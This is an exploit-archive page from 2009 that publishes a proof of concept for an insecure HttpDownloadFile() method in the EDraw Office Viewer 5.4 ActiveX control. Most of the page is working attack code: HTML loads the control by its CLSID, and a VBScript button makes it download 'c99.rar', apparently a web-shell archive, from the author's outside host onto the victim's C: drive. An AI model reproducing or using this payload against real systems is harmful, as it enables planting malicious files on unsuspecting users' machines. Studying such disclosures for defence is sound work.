EDraw Office Viewer 5.4 HttpDownloadFile() Insecure Method Vuln

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : EDraw Office Viewer 5.4 HttpDownloadFile() Insecure Method Vuln
# Published : 2009-01-14
# Author : Cyber-Zone
# Previous Title : TeamSpeak <= 2.0.23.17 Remote File Disclosure Vulnerability
# Next Title : Excel Viewer OCX 3.2 Remote File Execution Exploit

Edraw Office Viewer Component v5.4 HttpDownloadFile() Insecure Method



Founded By : Cyber-Zone
E-mail     : Paradis_des_fous@hotmail.fr
Home       : WwW.Exploiter5.CoM
GreetZ     : Houssamix , Hussin X , JiKo , StaCk , str0ke , The_5p3ctrum , BayHay , All Mgharba Wahed wahed Oujda 2009







<object classid='clsid:6BA21C22-53A5-463f-BBE8-5CF7FFA0132B' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  On Error Resume Next
    test.HttpDownloadFile "http://exploiter5.com/Cyber-Zone/c99.rar", "c:Cyber-Zonec99.rar"
    MsgBox("Done!")
 End Sub
</script>
</span>
</code></pre>

# www.Syue.com [2009-01-14]